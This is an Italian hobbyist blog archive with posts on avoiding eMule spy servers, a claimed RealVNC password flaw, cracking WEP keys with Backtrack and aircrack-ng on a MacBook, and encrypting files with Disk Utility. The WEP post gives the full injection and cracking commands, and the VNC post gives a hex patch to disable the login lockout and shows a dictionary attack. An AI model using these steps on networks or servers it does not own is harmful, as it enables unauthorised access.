logo

Archive for Password

Emule e server Spia

Si sente sempre più spesso parlare di “server spia”, ovvero server creati dalle lobbi multinazionali che, nel tentativo di  difendersi dalla pirateria, registrano e monitorizzano i nostri dati condivisi su emule, conservandosi probabilmente anche il nostro indirizzo I.P.

Da quello che si legge sulla rete sembra che tale attività abbia, almeno per il momento, solo una funzione statistica ma nulla vieta per il futuro di usare le nostre firme digitali (IP) per rintracciarci.

Ormai questi server stanno affinando i loro metodi di adescamento, per esempio alterando il numero degli “user connessi” in modo tale da indurre i più golosi a connettersi al server più gettonato.

I metodi di protezione sono semplici e ben illustrati su eMuleSecurity, primo tra tutti è quello di utilizzare server.met per aggiornare la lista solo con server verificati:

su Emule andate nella finestra server ed inserire in “Aggiorna lista server.met da URL” il seguente indirizzohttp://www.gruk.org/server.met.gz

su Amule andate su preferenze/server e, su ” Aggiorna lista server all’avvio“,  cliccate il pulsante “lista”  ed inserite il seguente URL http://www.gruk.org/server.met.g

Immagine 1.png

Immagine 5.png

Immagine 3.png

Poi dobbiamo evitare che vengano automaticamente aggiunti server spia all’elenco, pertanto sia su Emule che su Amule, andate nel pannello “Preferenze” e dalla scheda “Server” disabilitate:

    • Aggiorna lista server quando ci si connette ad un server

 

  • Aggiorna lista server quando un client si connette

Immagine 2.png

Un Bug in RealVNC

vnc.gif 

 

Facendo vari tentativi per verificare la sicurezza di RealVNC, mi sono accordo di una falla nel sistema di autenticazione del Server (VNC Password Authentication).
Premesso  che il sistema ha una protezione contro  il Dictionary Attacks con il quale, a seguito di 5 tentavi di connessione falliti, blocca l’autenticazione a l’accesso al server per circa 10 secondi (parametro variabile modificando il file .exe con un HEX editor sostituendo “d1e18948” con “90908948”) ed il Viewer Client visualizza la seguente frase:

“too many security failures”.

Questo in effetti non è un problema in quanto, se non si ha troppa fretta,  si può impostare un ritardo tra un attacco ed il successivo.

Imposto una semplice password numerica, ad esempio 1, creo un dizionario  con   numeri da 2  a 1000 (il numero 1 l’ho inserito verso il 300) e da terminale lancio l’attacco (sempre sulla mia rete di casa), dopo pochi secondi trovo  la password : Found, password:10!

Come “password: 10”?

Approfondisco la problematica e verifico che RealVNC si limita a controllare se il campo password, composta in questo caso da solo un carattere,  contiene il  numero 1, senza preoccuparsi di quello che segue, mi spiego meglio:

se la password è “1”, per autenticarsi vanno bene anche i seguenti numeri:

11,  111, 1111, 111111, 10, 100, 1001, 111101101010101!

pertanto potete immaginare che teoricamente, le password di accesso che consentono l’autenticazione sono infinite!!!!!!

Come contributo invierò questa segnalazione a www.realvnc.com

 

…. aggiornamento

Provo a contattare RealVNC per inviare la segnalazione, ma scopro che avendo scaricato la servione Free, non sono degno di contattarli, solo i clienti  Personal ed Interprice, che hanno pagato per avere un programma con un Bug possono accedere al servizio di assistenza.

Complimenti, mi ricorda le versione RealVNC 3.3.7 e 4.1.1  dove, se qualcuno ancora non lo sa, con il giusto Exploit chiunque può bypassare la password di accesso:

 

Meta 1.png 

 e vi assicuro che funziona.

Back|Track Packet injection con AirPort

dragon_small.jpg

Molti insistono ad impiegare, o meglio a provare ad utilizzare Kismac con la scheda Airport del Macbook con la speranza di violare una rete wireless, attualmente è impossibile. L’unica cosa che possono fare è abilitare i drivers per il “passive mode” (vedete l’articolo relativo) ma niente di più.

Con questo non voglio dire che con la scheda Airport non si può fare l’injection, è solo che per farlo usano la piattaforma sbagliata.

Difatti per abilitare tale funzione occorre solo il giusto programma:

Backtrack

una distribuzione live di Linux (circa 700 Mb) con vari utili programmi tra i quali Aircrack.

La procedura è molto semplice:

Andate sul sito http://www.remote-exploit.org/backtrack.html e scaricate l’immagine iso .

Una volta scaricata l’immagine masterizzatela su un CD (consiglio di farlo con Utility Disco/Masterizza senza complicarvi la vita con altri programmi).

Creato il cd lasciatelo inserito nel computer ed riavviate il MAC tenendo premuto il tasto C in modo tale da avviare da CD-rom, partirà l’installazione.

Quando vi verrà chiesto la modalità grafica vi consiglio di scegliere KDE.

Una volta installato aprite il pannello All Applications e sfogliate le seguenti cartelle:

Backtrack

Radio Network Analysis

80211

Cracking

Aircrack

Dalla cartella Aircrack avviate tre programmi in tre diverse Shell:

Air Replay

Aiodump

Aircrack

La procedura per cracking è stata già esaurientemente descritta nell’articolo relativo ad Aircrack-ng ma per completezza sintetizzo come procedere.

Il test è stato eseguito sulla mia rete Wireless per l’occasione protetta con chiave WEP.

Dalla Shell Airodump digitate:

iwconfig

e scoprite la sigla attribuita alla vostra scheda wifi:

lo no wileress extensions

eth0 no wileress extensions

wifi0 no wireless exensions

ath0 IEEE 802.11g ESSID:”” Nikname:””

Mode: Managed Channel:0 Access Point Not-Associated

Bit Rate:0 kb/s Tx-Power:14 dBm Sensitivity:1/1

Retry:off RTS thr:off Fragment thr:off

Encription key :off Power Management:off

digitate

airmon-ng start wifi0:

interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

che abilita ath1 (la mia scheda) in monitor mode

poi:

airodump-ng ath1

segnatevi il canale CH e fermate l’applicazione:

ctrl C

digitate:

airodump-ng -c 1 -w pippo ath1

Airodump inizierà a lavorare e salverà di dati catturati nel file pippo-01.cap

Adesso per stimolare la produzione di IVs procedete con l’injection:

per testare se la scheda funziona:

aireplay-ng -9 ath1

se è tutto ok apparirà:

Trying broadcast probe requests….

Found 1 AP

poi procederò a pingare gli Access Point disponibili:

Trying directed probe requests

00:19:xx:xx:xx:xx – channel 1 – ‘Alice-xxxxxx’

Ping (min/avg/max): 3.969ms/104.333ms/171.666 ms Power 78.79

30/30: 100%

Injection is working!

aireplay-ng -3 -b (indirizzo MAC del A.P.) -d ff:ff:ff:ff:ff:ff -h (indirzzo MAC del T.C.) ath1

ed ecco partire l’injection dalla nostra Airport.

Dalla Shell di Airodump tenete sotto controllo i paccketti IVs catturati e, quanto arrivate ad un numero discreto (a me ne sono bastati 34000), procedete con il cracking.

Dalla Shell di Aircrack digitate

aircrack-ng -a 1 pippo-01.cap

se i pacchetti catturati sono sufficienti, in pocki secondi otterrete la chiave.

Come già detto per i dettagli e le varie modalità di attacco leggete l’articolo relativo a Aircrack ng.

Buon lavoro


Criptare files su MAC

Per criptare dati sul proprio Mac suggerisco di sfruttare le potenzialità della piattaforma OS. Difatti una valida alternativa a FileVault (che protegge, criptandola, la cartella inizio) è utlizzare Utility Disco per creare una immagine protetta a 128 o 256 Bit!

Immagine 3.png

Dalla cartella Utility lanciate Utility Disco

Immagine 4.png

e selezionate Nuova Immagine

Immagine 5.png

decidete il nome, la posizione e la dimensione dell’immagine, poi selezionate il tipo di Criptatura desiderata

Immagine 6.png

consiglio 256-bit AES, con un core2 non si riscontrano problemi di lentezza

Immagine 7.png

poi scegliete la password da impegare, naturalmente facile da ricordare (la finestra vi indica anche la robustezza della stessa)

Immagine 8.png

Il programma crea un file xxxxxx.dmg criptato.

Per accedere ai vostri dati inserite la votra password

Immagine 9.png

e qualora corretta accedete al vostro disco virtuale. Cosiglio di non salvarla nel portachiavi.

Per cripatare nuovamente basta espellere il disco

Immagine 10.png